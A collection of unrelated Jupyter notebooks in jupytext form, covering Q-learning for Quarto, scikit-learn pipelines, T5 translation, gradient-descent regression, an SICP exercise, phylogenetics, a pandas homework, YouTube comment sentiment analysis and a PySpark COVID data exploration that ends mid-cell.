plt.subplots(ncols=1,nrows=2,figsize=(18,30)) axes.ravel()[0].imshow(img) axes.ravel()[0].set_title('Original') axes.ravel()[1].imshow(out) axes.ravel()[1].set_title('After Compression') plt.show() else: plt.imshow(x) def evaluate(ds,idx, showImages = False): model.eval() x = ds[idx] iimg = TF.to_pil_image(x) x=x.unsqueeze(0).cuda() y = model(x) oimg = TF.to_pil_image(y.squeeze(0).cpu().detach()) score = (pytorch_msssim.msssim(x, y).item()) # print("MSSSIM score is {:.5f}".format(score)) if showImages: display_((iimg,oimg)) return score # - vds = imgDataset(indices=val_indices) total_score=0 for i in range(0,len(vds)): total_score += evaluate(vds,i) print('Average MSSSIM on validation is {:.5f}'.format(total_score/len(vds))) import shutil shutil.rmtree('pytorch-msssim')
notebooks/1bppmodel.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Train your player # # This notebook will give a concrete example on how to train an agent for Quarto using Q-learning. # At the end, it will also show how to submit your implementation to the arena. # + # Imports from quarto.environment import Environment from quarto.base_player import RandomPlayer, DummyPlayer from quarto.train import train, run_duel from copy import deepcopy import pickle import numpy as np # + # Create environment env = Environment() env # + # Implement a Q-learning agent class QLearningPlayer: def __init__(self, train_mode): # Whether we are in training or playing mode # In training mode, this player will update its Q-table # and sometimes take a random action to explore more self.train_mode = train_mode # This agent's Q-table. # It is a map from state to action value pre action: # q_table[state][action]: float self.q_table = {} self.action_space = 256 # Epsilon scheduling self.epsilon = 1 self.min_epsilon = 0.1 self.epsilon_decay = 0.99995 # Q-table update hyperparameters self.alpha = 0.1 self.gamma = 1 # Q-table update helper variables self.prev_state = None self.prev_action = None def start(self, state, valid_actions): # First move: take the action return self._take_action(state, valid_actions) def step(self, state, valid_actions, reward): # At every other step: update the q-table and take the next action # Since the game hasn't finished yet, we can use current knowledge of the q-table # to estimate the future reward. if self.train_mode: action_values = self._get_action_values(state, valid_actions) self._update_q_table(reward + self.gamma * np.max(action_values)) return self._take_action(state, valid_actions) def end(self, state, reward): # Last step: update the q-table and schedule the next value for epsilon # Here, the expected action-value is simply the final reward if self.train_mode: self._update_q_table(reward) self.epsilon = max(self.min_epsilon, self.epsilon * self.epsilon_decay) def _update_q_table(self, new_value): # Based on the reward of the previous action take at the previous step, # update the q-table to be closer to the desired value. # Note that, if `alpha` is zero, the q-table is left unchanged, # if `alpha` is one, the q-table will simply take the `new_value`. # With a value in between, one can control the tradeoff between learning too much # or too little from a single move prev_state = tuple(self.prev_state) q_row = self.q_table.setdefault(prev_state, np.zeros(self.action_space)) q_row[self.prev_action] += self.alpha * (new_value - q_row[self.prev_action]) def _take_action(self, state, valid_actions): # Store the current state, copying it, otherwise the environment could mutate it afterwards self.prev_state = state.copy() if self.train_mode and np.random.random() <= self.epsilon: # Take a random action self.prev_action = np.random.choice(valid_actions) else: # Take the action that has the highest expected future reward, # that is, the highest action value action_values = self._get_action_values(state, valid_actions) self.prev_action = valid_actions[np.argmax(action_values)] return self.prev_action def _get_action_values(self, state, valid_actions): # Convert from numpy array to tuple state = tuple(state) if self.train_mode: # Return saved action values. If this is the first time this state is visited, # set all values to zero return self.q_table.setdefault(state, np.zeros(self.action_space))[valid_actions] # When not in train mode, do not change the Q-table, just return a new default for # every new never-visited state return self.q_table.get(state, np.zeros(self.action_space))[valid_actions] def get_freezed(self): # Return a copy of the player, but not in train_mode # This is used by the training loop, to replace the adversary from time to time copy = deepcopy(self) copy.train_mode = False return copy def save(self): # Save the q-table on the disk for future use with open('quarto/submission/player.bin', 'wb') as fp: pickle.dump(dict(self.q_table), fp, protocol=4) # + # Train the agent player = QLearningPlayer(True) def on_cycle_end(cycle): # Show some nice stats empty_state, empty_actions = env.reset() print(f'Q-table size={len(player.q_table)}, epsilon={player.epsilon}') open_moves = player._get_action_values(empty_state, empty_actions) best_open_moves = np.argsort(open_moves)[-5:] print(f'5 best opening moves={list(zip(best_open_moves, open_moves[best_open_moves]))}') train(env, player, on_cycle_end=on_cycle_end, cycles=5) # + # Run some players against each other to see how they fare players = [RandomPlayer(False), DummyPlayer(False), player.get_freezed()] for i, p1 in enumerate(players): for p2 in players[i:]: print(p1.__class__.__name__, p2.__class__.__name__, run_duel(env, p1, p2, 1000)) # + # Measure the number of different states recorded in the Q-table # For each depth of the game, show the number of non-zero entries from collections import Counter, defaultdict info = defaultdict(Counter) for k, v in player.q_table.items(): depth = np.sum(np.array(k) != -1) played = np.sum(v != 0) info[depth][played] += 1 sorted((k, sorted(v.items())) for k, v in info.items()) # - # # Submit your player to the arena # # 1. Write a simple Python file named `player.py` with a class named `Player` that contains your implementation and some extra code to load any saved training data (like the Q-table). You can see a working example in the folder `quarto/submission` is this repo. # # 2. Test your code and create the ZIP with `python -m quarto.prepare_submission` # # 3. Create your account in https://angers.schoolofai.fr/ and submit your player # !python -m quarto.prepare_submission # # Tweak the implementation, add more logs, debug, improve, have fun :) # + # TODO
Train your player.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="BuD533H3K4ed" # # Pipeline # 파이프라인은 여러 변환 단계를 정확한 순서대로 실행할 수 있도록 하는 것이다. # # 사이킷런은 연속된 변환을 순서대로 처리할 수 있도록 도와주는 Pipeline 클래스가 있다. # + id="0DD3_Z_5UFcs" from sklearn.pipeline import Pipeline from sklearn.preprocessing import StandardScaler from sklearn.impute import SimpleImputer from sklearn.preprocessing import StandardScaler, OneHotEncoder import numpy as np # + [markdown] id="ax0Zmk3M1UT9" # ### Define Pipeline # + id="k4wr5lGYBHje" # 버전이 낮아 SimpleImputer 를 사용할 수 없으면 Imputer을 사용한다. from sklearn.preprocessing import Imputer num_pipeline = Pipeline([ ('imputer', Imputer(strategy="median")), ('std_scaler', StandardScaler()) ]) # + id="wDBtcS3hofhf" num_pipeline = Pipeline([ ('imputer', SimpleImputer(strategy="median")), ('std_scaler', StandardScaler()) ]) # + id="6dyFSvCDEjUA" outputId="5c8a2242-af86-405a-adbb-e73721e9d911" colab={"base_uri": "https://localhost:8080/"} # sample test data test_data = np.array([10,20,30,40,50,np.nan]).reshape(-1,1) print(test_data) x = num_pipeline.fit_transform(test_data) print(x) # + [markdown] id="YzzS2ULE1s-r" # ### Pipeline Example # # 파이프라인 실습에 필요한 임의의 데이터를 생성한다. # # + id="f-OCu0JMwGUw" outputId="b438feff-dcb1-42cf-890b-ec7b6292c89a" colab={"base_uri": "https://localhost:8080/", "height": 142} import pandas as pd from io import StringIO csv_data = \ '''A,B,C,D 1.0,2.0,3.0,4.0 5.0,6.0,,8.0 10.0,11.0,12.0,''' df = pd.read_csv(StringIO(csv_data)) df # + id="BIMFOcsAEWlc" outputId="cee279b6-f42e-406e-feff-a0c9349a8ed0" colab={"base_uri": "https://localhost:8080/"} # numpy array 형태로 변환. df.to_numpy() df.values # + id="aJVnh1XXEgrw" outputId="1cfb61a2-54b0-40a6-ecd1-1bee2a293a9b" colab={"base_uri": "https://localhost:8080/"} # fit_transform 메소드로 파이프라인을 활용한 변환을 수행한다. transformed = num_pipeline.fit_transform(df.values) print(transformed) # + id="QyvS3J9-HIhh" outputId="d60769cb-d7f2-414f-ce1e-6ae50fe4db47" colab={"base_uri": "https://localhost:8080/"} # 개별적인 파이프라인의 단계를 확인할 수 있다. num_pipeline.steps # + id="ztRem80cHS-4" outputId="91144bd7-5195-42cd-c115-cf9a72b0e04a" colab={"base_uri": "https://localhost:8080/"} num_pipeline.steps[0] # + id="rT4oAgIlHKSf" outputId="eeb0ff0a-4da7-4de9-9f34-63cf7d8f9857" colab={"base_uri": "https://localhost:8080/"} # 개별 변환단계의 일부 옵션 파라미터를 수정할 수 있다. num_pipeline.set_params(imputer__strategy='mean') # 결측치 대체 방법 변경한다. # + id="OPW4JzMIIiQR" outputId="0c2db41e-d3a9-4cce-efce-13b274e00695" colab={"base_uri": "https://localhost:8080/"} transformed = num_pipeline.fit_transform(df.values) print(transformed) # + [markdown] id="YZsOZbINF-Ro" # ## iris 데이터셋을 활용한 실습 # iris dataset을 표준화하고 로지스틱 회귀모형을 통해 분류 모형을 생성한다. # 파이프라인을 사용하면 전처리에서 부터 모형 생성을 포함할 수 있다. # + id="rw-DmxdP3XOi" from sklearn import datasets from sklearn.linear_model import LogisticRegression iris = datasets.load_iris() features = iris.data target = iris.target # + id="nzzTuE-T30v5" pipe = Pipeline([ ("std_scaler", StandardScaler()), ("classifier", LogisticRegression()) ]) # + [markdown] id="Sy39fPT8Gt6d" # iris 데이터셋을 훈련데이터와 테스트데이터 셋으로 분리하고 fit 메소드를 사용하면 모델을 훈련할 수 있다. # + id="M9kn2DxF450E" from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split( features, target, test_size =0.2, stratify=target) model = pipe.fit(X_train, y_train) # + [markdown] id="aOuiBFFdG8kl" # 훈련된 모형에 새로운 임의의 데이터를 적용하여 분류가 되는지 확인해 본다. # + id="z8Q0UNJB5Nje" outputId="b312cab4-fcf5-4a45-d703-95fe8c12358f" colab={"base_uri": "https://localhost:8080/"} new_obs = [[0.5, 0.5, 0.5, 0.5]] print(pipe.predict(new_obs)) print(pipe.predict_proba(new_obs))
02DataPreprocess/07Pipeline.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- from adaptnlp import EasyTranslator # + text = ["Machine learning will take over the world very soon.", "Machines can speak in many languages.",] translator = EasyTranslator() # + # Translate translations = translator.translate(text = text, t5_prefix="translate English to German", model_name_or_path="t5-small", mini_batch_size=1, min_length=0, max_length=100, early_stopping=True) print("Translations:\n") for t in translations: print(t, "\n") # -
tutorials/6. Translation/translation.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Taxi Fare Predictor # + active="" # This is a machine Learning model which predicts tax fare in rupees depending upon the input distance in kms # + # %matplotlib inline import matplotlib import numpy as np import matplotlib.pyplot as plt # - # #Importing Data # + points=np.genfromtxt('Fare.csv',delimiter=',') #Extracting Columns x=np.array(points[:,0]) y=np.array(points[:,1]) #Plotting dataset plt.scatter(x,y) plt.xlabel('Distance in Kms') plt.ylabel('Fare in rupees') plt.title('Distance v/s Fare') plt.show() # + #Hyperparameters learningRate=0.01 initial_b=0 initial_w=0 numIterations=10 # - # Cost function def computeCost(b,w,points): totalCost=0 N=float(len(points)) for i in range(0,len(points)): x=points[i,0] y=points[i,1] totalCost=totalCost+(y-(w*x+b))**2 return totalCost/N # Gradiant descent function # + def gradient_descent(points,starting_b,starting_w,learningRate,numIterations): b=starting_b w=starting_w cost_graph=[] for i in range(numIterations): cost_graph.append(computeCost(b,w,points)) b,w=step_gradient(b,w,np.array(points),learningRate) return [b,w,cost_graph] def step_gradient(current_b,current_w,points,learningRate): gradient_w=0 gradient_b=0 N=float(len(points)) for i in range(0,len(points)): x=points[i,0] y=points[i,1] gradient_w=gradient_w+(-(2/N)*x*(y-(current_w*x+current_b))) gradient_b=gradient_b+(-(2/N)*(y-(current_w*x+current_b))) updated_w=current_w-learningRate*gradient_w updated_b=current_b-learningRate*gradient_b return updated_b,updated_w # + b,w,cost_graph=gradient_descent(points,initial_b,initial_w,learningRate,numIterations) print('Optimized b:',b) print('Optimized w',w) print('Minimized cost:',computeCost(b,w,points)) # - # Plotting cost per iterations plt.plot(cost_graph) plt.xlabel('No. of iterations') plt.ylabel('Cost') plt.title('Cost per iterations') plt.show() # Plotting line of best fit plt.scatter(x,y) pred=w*x+b plt.plot(x,pred,c='r') plt.xlabel('Distance in Kms') plt.ylabel('Fare in rupees') plt.title('Line of best fit') plt.show()
Taxi Fare.ipynb
;; --- ;; jupyter: ;; jupytext: ;; text_representation: ;; extension: .scm ;; format_name: light ;; format_version: '1.5' ;; jupytext_version: 1.14.4 ;; kernelspec: ;; display_name: Calysto Scheme 3 ;; language: scheme ;; name: calysto_scheme ;; --- ;; # Execercise 1.20 ;; ;; ;; + (define (gcd a b) (print "CALLED") (if (= b 0) a (gcd b (remainder a b)))) (gcd 206 40) ;; + ;; Normal-order ;; Number of calles are infinity? ;; ==== WRONG ANSER!!! ==== ;; NO!!! ;; The expression inside the `if` condition will be evaluated every time -> w/o this evalution the procedure cannnot determine the next step ;; So the answer will be 18 (gcd 206 40) (print "====") (gcd 40 (remainder 206 40)) (print "====") (gcd (remainder 206 40) (remainder 40 (remainder 206 40))) (print "====") (gcd (remainder 40 (remainder 206 40)) (remainder (remainder 206 40) (remainder 40 (remainder 206 40)))) (print "====") (gcd (remainder (remainder 206 40) (remainder 40 (remainder 206 40))) (remainder (remainder 40 (remainder 206 40)) (remainder (remainder 206 40) (remainder 40 (remainder 206 40))))) ;; + ;; Adaptive ;; 4 times (gcd 206 40) (print "====") (gcd 40 (remainder 206 40)) (gcd 40 6) (print "====") (gcd 6 (remainder 40 6)) (gcd 6 4) (print "====") (gcd 4 (remainder 6 4)) (gcd 4 2) (print "====") (gcd 2 (remainder 4 2)) (gcd 2 0) ;; -
chapter01/ex1.20.rkt.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: jharman # language: python # name: jharman # --- # # Phylogenetics Quickstart Guide import phylogenetics as phy import phylogenetics.tools as tools import phylopandas as ph import pandas as pd # + # initialize project, create data folder project = phy.PhylogeneticsProject(project_dir='project1', overwrite=True) # read in initial seed sequence(s) for BLASTing project.read_data(path="md2_seed_sequence.txt", schema="fasta") # Run NCBI blast (default protein, 100 hits, e-value cutoff = 0.01) project.compute_blast(hitlist_size=100) # Cluster redundant sequences w/ cdhit project.compute_clusters() # Align sequences w/ muscle project.compute_alignment() # Curate alignment w/ Gblocks project.compute_gblocks() # Compute tree using PhyML project.compute_tree() # Reconstruct ancestral proteins using PAML project.compute_reconstruction() # - # View data in phylopandas dataframe object project.data.head() # + # Visualize tree and ancestors using phylovega from phylovega import TreeChart # Construct Vega Specification chart = TreeChart.from_phylopandas( project.data, height_scale=300, # Node attributes node_size=300, node_color="#ccc", # Leaf attributes leaf_labels="id", # Edge attributes edge_width=2, edge_color="#000", ) chart
examples/quickstart_guide.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- # Welcome to your HW1 notebook :) # First, let's bring in our required modules (renaming them as they come in): print("Hello INF250!") # Your turn - create cells below, to read in the Fortune500 csv file, and compute summary for Revenues. # # Since you have the notebook .pynb file and the dataset files in the same dir, you can simply specify the filename of the dataset, otherwise you'd specify the entire path to the filename. # # You would use the Pandas .read_csv() command, to read the csv file. The result (output) of read_csv() is a DataFrame object: https://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.html # # Once you have a dataframe (a rectangular frame of data), you can perform operations on it. # # a. create a cell, to read in fortune500.csv # # b. create a cell below, to rename the 'Revenues (in millions)' column to just 'Revenues'. Hint: use .rename(), with a columns={old:new} argument. # # c. create another cell, to summarize the 'Revenues' column (print out the mean, std deviation, etc). Hint: in a dataframe, each column can be accessed as a dictionary key. # + import pandas as pd pd.read_csv("fortune500.csv") # + company.columns company.rename(columns = {'Revenue (in millions)':'Revenue'}, inplace = True) # - company[["Revenue"]].describe() # Next, let's work on the 'iris' dataset. # # As before, first open the dataset, create a dataframe. Note that unlike the fortune500 dataset, this one does NOT have column names listed at the top (so you need to make sure you read all the rows as data, including the first row) - you need to 'manually' specify these column names: 'Sepal_Length', 'Sepal_Width', 'Petal_Length', 'Petal_Width', 'Class'. # # 'Describe' the dataset, then print out the top 5 lines. # # Use matplotlib to plot a histogram for each of the 4 columns - use 20 as the number of 'bins' for each column. Here's matplotlib: https://matplotlib.org/ and within it, the .hist() histogram command: https://matplotlib.org/api/_as_gen/matplotlib.pyplot.hist.html (you only need to specify a column name and num_bins, as a bare minimum). # # + import pandas as pd iris = pd.read_csv("irisdataset.csv") print(iris) # + # Append .columns to dataframe, insert column names using [,x,y,z] iris.columns = ['Sepal_Length', 'Sepal_Width', 'Petal_Length', 'Petal_Width', 'Class'] print(iris) # - # .describe() creates basic statisitical overview. Append describe() to dataframe. iris.describe() # .head() allows us to display top 5 lines (0-4). Default hist() is 5. iris.head() # .hist() using 20 as the number of bins (bins=) hist = iris.hist(bins=20)
hw1_DSCI250.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + deletable=true editable=true # %matplotlib inline from textblob import TextBlob, Word import matplotlib.pyplot as plt import seaborn as sns sns.set(color_codes=True) # + [markdown] deletable=true editable=true # # Aspect Based Sentiment Analysis (ABSA) of YouTube comments # + [markdown] deletable=true editable=true # ABSA is really interesting since it gives a deep view of the variance of sentiments within a large corpus of text. # # Most sentiment systems run sentiment analysis on the entire text, which sort of 'averages out' the sentiment. Running aspect based sentiment analysis on things like product reviews or YouTube comments can help the creators understand the specific parts that the users liked. # # This is my attempt at running ABSA on the YouTube comments on <NAME>'s *amazing* YouTube video [here](https://www.youtube.com/watch?v=si8zZHkufRY). (PS: The video is about sentiment analysis using tflearn, but I am using TextBlob in this version for quick implementation.) # + [markdown] deletable=true editable=true # Data gathered using the YouTube Data API's [commentThreads.list](https://developers.google.com/youtube/v3/docs/commentThreads/list) function. # # Alright, here goes. # (*Cracks fingers*) # + deletable=true editable=true import csv with open('data.csv', 'r') as f: reader = csv.reader(f) result = list(reader) result = result[0] result[:10] # + deletable=true editable=true # Text cleaning from string import punctuation import re def clean_sentence(sentence): sentence = re.sub(r"(?:\@|https?\://)\S+|\n+", "", sentence.lower()) # Fix spelling errors in comments! sent = TextBlob(sentence) sent.correct() clean = "" for sentence in sent.sentences: words = sentence.words # Remove punctuations words = [''.join(c for c in s if c not in punctuation) for s in words] words = [s for s in words if s] clean += " ".join(words) clean += ". " return clean result = [clean_sentence(x) for x in result] result[:10] # + deletable=true editable=true # Check sentiment polarity of each sentence. sentiment_scores = list() i = 0 for sentence in result: line = TextBlob(sentence) sentiment_scores.append(line.sentiment.polarity) if(i <= 10): print(sentence + ": POLARITY=" + str(line.sentiment.polarity)) i += 1 # + deletable=true editable=true # Let's plot these sentiments! sns.distplot(sentiment_scores) # + [markdown] deletable=true editable=true # We can see that a majority of the comments are marked as neutral (though slightly on the positive side). This basically implies that TextBlob SA 'averages' out over a sentence. # # So for a sentence containing : "Love your videos and humor." the polarity is 0.167 plainly because it is also followed by "curiously once training is complete how do you feed a movie review into the model or access the model ie where is model saved at the completion of training". # # Let's now try aspect based SA and see if we get better results! # + deletable=true editable=true # Convert array of comments into a single string comments = TextBlob(' '.join(result)) # + deletable=true editable=true # Check out noun phrases, will be useful for frequent feature extraction comments.noun_phrases # + [markdown] deletable=true editable=true # # Pruning # # Quite a lot of these noun phrases are repeated or have the same subset of words. We now run modified versions of redundancy pruning and compactness pruning. # # ## Compactness pruning: # # We check for compact phrases and see if the words in the phrases make sense. For e.g the phrase "i m" fails the compact pruning test and is pruned. A simple way to carry out compact pruning is by checking the words in a phrase and seeing if a dictionary meaning exists. If the number of words in the phrase without dictionary meanings cross a certain threshold, we prune the phrase. (This can be counter-intuitive at times, because technical terms that do not have a dictionary meaning can get pruned). # + deletable=true editable=true #compactness pruning: cleaned = list() for phrase in comments.noun_phrases: count = 0 for word in phrase.split(): # Count the number of small words and words without an English definition if len(word) <= 2 or (not Word(word).definitions): count += 1 # Only if the 'nonsensical' or short words DO NOT make up more than 40% (arbitrary) of the phrase add # it to the cleaned list, effectively pruning the ones not added. if count < len(phrase.split())*0.4: cleaned.append(phrase) print("After compactness pruning:\nFeature Size:") len(cleaned) # + [markdown] deletable=true editable=true # # ## Redundancy pruning: # I am using a naive decision of choosing the _largest common noun phrase_ as a non-redundant feature. A better way would be to find 'important' terms in common noun phrases and choose those. One approach to that could be something called TF-IDF (more about that [here](http://stevenloria.com/finding-important-words-in-a-document-using-tf-idf/)). # + deletable=true editable=true for phrase in cleaned: match = list() temp = list() word_match = list() for word in phrase.split(): # Find common words among all phrases word_match = [p for p in cleaned if re.search(word, p) and p not in word_match] # If the size of matched phrases set is smaller than 30% of the cleaned phrases, # then consider the phrase as non-redundant. if len(word_match) <= len(cleaned)*0.3 : temp.append(word) match += word_match phrase = ' '.join(temp) # print("Match for " + phrase + ": " + str(match)) if len(match) >= len(cleaned)*0.1 : # Redundant feature set, since it contains more than 10% of the number of phrases. # Prune all matched features. for feature in match: if feature in cleaned: cleaned.remove(feature) # Add largest length phrase as feature cleaned.append(max(match, key=len)) print("After redundancy pruning:\nFeature Size:" + str(len(cleaned))) print("Cleaned features:") cleaned # + [markdown] deletable=true editable=true # We now find the noun phrases with maximum frequencies and select the "frequent feature set" using a certain cutoff. # + deletable=true editable=true from nltk.corpus import stopwords feature_count = dict() for phrase in cleaned: count = 0 for word in phrase.split(): if word not in stopwords.words('english'): count += comments.words.count(word) print(phrase + ": " + str(count)) feature_count[phrase] = count # + deletable=true editable=true # Select frequent feature threshold as (max_count)/100 # This is an arbitrary decision as of now. counts = list(feature_count.values()) features = list(feature_count.keys()) threshold = len(comments.noun_phrases)/100 print("Threshold:" + str(threshold)) frequent_features = list() for feature, count in feature_count.items(): if count >= threshold: frequent_features.append(feature) print('Frequent Features:') frequent_features # + deletable=true editable=true # Let's plot these feature occurences and draw the threshold line sns.set() sns.set_context("poster") f, ax = plt.subplots(figsize=(10, 50)) sns.swarmplot(y=features, x=counts, color="c", ax=ax) plt.plot([threshold, threshold], [0, len(features)], linewidth=4, color="r") # + [markdown] deletable=true editable=true # ## Feature Specific Sentiment Analysis # Now that we have the frequent features, we scan through the comments and find the sentences that contain these features. We then run sentiment analysis on these 'feature specific' sentences to get somewhat crude feature based sentiment scores. Further refinement will include generalizing the features, for e.g: "wonderful python library" could be generalized to "software", which will eventually lead to aspect wise sentiment scores. # + deletable=true editable=true absa_list = dict() # For each frequent feature for f in frequent_features: # For each comment absa_list[f] = list() for comment in result: blob = TextBlob(comment) # For each sentence of the comment for sentence in blob.sentences: # Search for frequent feature 'f' q = '|'.join(f.split()) if re.search(r'\w*(' + str(q) + ')\w*', str(sentence)): absa_list[f].append(sentence) # print("Aspect Specific sentences:") # absa_list # + [markdown] deletable=true editable=true # ## Aspect based sentiment scoring # Now that we have aspect specific sentences, all we have to do is run sentiment analysis on each sentence using TextBlob's sentiment analyzer. # # + deletable=true editable=true scores = list() absa_scores = dict() for k, v in absa_list.items(): absa_scores[k] = list() for sent in v: score = sent.sentiment.polarity scores.append(score) absa_scores[k].append(score) # + deletable=true editable=true # Now that we have all the scores, let's plot them! # For comparison, we replot the previous global sentiment polarity plot fig, (ax1, ax2) = plt.subplots(ncols=2, sharey=True, figsize=(20, 10)) plot1 = sns.distplot(scores, ax=ax1) ax1.set_title('Aspect wise scores') ax1.set_xlabel('Sentiment Polarity') ax1.set_ylabel('# of comments') ax2.set_title('Comment wise scores') ax2.set_xlabel('Sentiment Polarity') ax2.set_ylabel('# of comments') plot2 = sns.distplot(sentiment_scores, ax=ax2) # + [markdown] deletable=true editable=true # ## Graph Analysis # Notice the high amount of variance in the aspect based scores on the left. Even though a majority of the scores are neutral, there is lot of variance in the number of comments with positive sentiments. The total number of scores have also increased since one sentence of a comment may contain multiple frequent features. # # Now let's plot the scores grouped by aspects. # # + deletable=true editable=true # Create data values for stripplot and boxplot vals = dict() vals["aspects"] = list() vals["scores"] = list() for k, v in absa_scores.items(): for score in v: vals["aspects"].append(k) vals["scores"].append(score) # + deletable=true editable=true fig, ax1 = plt.subplots(figsize=(30, 10)) color = sns.color_palette("Blues", 6) plt.xticks(rotation=90) sns.set_context("paper", font_scale=3) sns.boxplot(x="aspects", y="scores", data=vals, palette=color, ax=ax1) # + [markdown] deletable=true editable=true # Now we see the real strength of Aspect Based Sentiment Analysis. The box plots show a large amount of variance among sentiments across a variety of aspects. Keep in mind though, the aspects have been chosen based on frequency of noun phrases, so some of the phrases may not make sense (I am looking at you, "baby activation functionstrack"). # # Nevertheless, this goes to show that carrying out sentiment analysis on aspects provides much more information than normal sentiment analysis. Also, we take a naive approach of picking the largest noun phrase as the aspect, which may not be the best assumption for all cases. For e.g, an aspect "project" would be better than "twitter sentiment analysis project", which works against my assumption. # + deletable=true editable=true color = sns.color_palette("Reds", 6) fig, ax1 = plt.subplots(figsize=(30, 10)) plt.xticks(rotation=90) sns.set_context("paper", font_scale=2) sns.stripplot(x="aspects", y="scores",data=vals, palette=color) # + [markdown] deletable=true editable=true # # Conclusion # I ran Aspect Based Sentiment Analysis (ABSA) on a YouTube [video](https://www.youtube.com/watch?v=si8zZHkufRY) and found that ABSA actually gives a more in-depth understanding of people's reviews. # # The sentiment scores have a large variance as compared to 'global' sentiment analysis. There are a lot of assumptions in the algorithms, but I hope the process proves the point that analyzing reviews/comments and scoring them as per the aspects that the reviewers talk about is more beneficial for the creator than conventional Sentiment Analysis. # # I hope this notebook has been informative and useful. If you are interested in Aspect Based Sentiment Analysis, you can check out [this](http://www.aclweb.org/anthology/S15-2082) paper. You can also check out the [SemEval](http://alt.qcri.org/semeval2016/task5/) task for Aspect Based Sentiment Analysis.
ABSA of YouTube Comments.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Data Understanding # ## Setup # + # Python ≥3.5 is required import sys assert sys.version_info >= (3, 5) # Scikit-Learn ≥0.20 is required import sklearn assert sklearn.__version__ >= "0.20" # Common imports import numpy as np import os # Imports for Correlation, Summarizer and ChiSquareTest from pyspark.ml.stat import Correlation from pyspark.ml.feature import VectorAssembler from pyspark.sql import SparkSession from pyspark.ml.stat import ChiSquareTest from pyspark.ml.stat import Summarizer from pandas.plotting import parallel_coordinates import pandas as pd # To plot pretty figures # %matplotlib inline import matplotlib as mpl import matplotlib.pyplot as plt mpl.rc('axes', labelsize=14) mpl.rc('xtick', labelsize=12) mpl.rc('ytick', labelsize=12) # Where to save the figures PROJECT_ROOT_DIR = "." CHAPTER_ID = "end_to_end_project" IMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, "images", CHAPTER_ID) os.makedirs(IMAGES_PATH, exist_ok=True) def save_fig(fig_id, tight_layout=True, fig_extension="png", resolution=300): path = os.path.join(IMAGES_PATH, fig_id + "." + fig_extension) print("Saving figure", fig_id) if tight_layout: plt.tight_layout() plt.savefig(path, format=fig_extension, dpi=resolution) # for pretty printing def printDf(sprkDF): newdf = sprkDF.toPandas() from IPython.display import display, HTML return HTML(newdf.to_html()) # Ignore useless warnings (see SciPy issue #5998) import warnings warnings.filterwarnings(action="ignore", message="^internal gelsd") # Spark libs from pyspark.sql.session import SparkSession # helper functions from helpers.helper_functions import translate_to_file_string # for pretty printing def printDf(sprkDF): newdf = sprkDF.toPandas() from IPython.display import display, HTML return HTML(newdf.to_html()) inputFile = translate_to_file_string("./data/Data_Preparation_Result.csv") # - # ## Create Spark Session #create a SparkSession spark = (SparkSession .builder .appName("RKIDATAUNDERSTANDING") .getOrCreate()) # create a DataFrame using an ifered Schema df = spark.read.option("header", "true") \ .option("inferSchema", "true") \ .option("delimiter", ";") \ .csv(inputFile) print(df.printSchema()) df.count() # ## Lagemaße printDf(df.summary()) # ## Balkendiagramme # An dieser Stelle wurde bewusst darauf verzichtet Histogramme zu verwenden, da vor allem Qualitative Merkmale (z.B. Bundesland - Nominal, Geschlecht - Nominal,Altersgruppe - Ordinal,...) vorliegen. Stadtdessen wurde auf Bar-Charts zurückgegriffen. # Hinweis: Der Fallstatus nicht eingetreten bedeutet, dass die Person aktuell noch erkrankt ist. # ### Initalisierung # Init # %matplotlib inline import matplotlib.pyplot as plt # ### Balkendiagram Bundesland # Nachfolgend soll ein Balkendiagramm der aktuellen Coronazahlen, nach dem Fallstatus je Bundesland erstellt werden. Dies soll Auskunft über die Verteilung der Fälle nach Bundesland geben. # Vorbereiten des DataFrames durch Gruppieren des Bundesland und Anwendung der Pivot-Funktion auf das Attribut Fallstatus dfBundeslandGrouped = df.groupBy("Bundesland").pivot("FallStatus").count().orderBy("GENESEN","GESTORBEN", "NICHTEINGETRETEN", ascending=False) dfPandasBundesland = dfBundeslandGrouped.toPandas() dfBundeslandGrouped.show() # Erstellen des Balkendiagramms ax = dfPandasBundesland.plot.bar(x='Bundesland', ylabel="Anzahl Fälle",width=0.8, title="Fallzahlen nach Status je Bundesland", figsize=(20,8), rot=90, stacked=True) save_fig("attribute_bar_plots") plt.show() # ### Balkendiagram Geschlecht # Nachfolgend soll ein Balkendiagramm der aktuellen Coronazahlen nach dem Fallstatus je Bundesland erstellt werden. Dies soll Auskunft über die Verteilung der Fälle nach Bundesland geben. # Vorbereiten des DataFrames durch Gruppieren des Bundeslands und Anwendung der Pivot-Funktion auf das Attribut Fallstatus dfGeschlechtGrouped = df.groupBy("Geschlecht").pivot("FallStatus").count().orderBy("GENESEN","GESTORBEN", "NICHTEINGETRETEN", ascending=False) dfPandasGeschlecht = dfGeschlechtGrouped.toPandas() dfGeschlechtGrouped.show() # Erstellen des Balkendiagramms ax = dfPandasGeschlecht.plot.bar(x='Geschlecht', ylabel="Anzahl Fälle",width=0.5, title="Fallzahlen nach Status je Geschlecht", figsize=(15,10), rot=90, stacked=True) # Don't want scaled 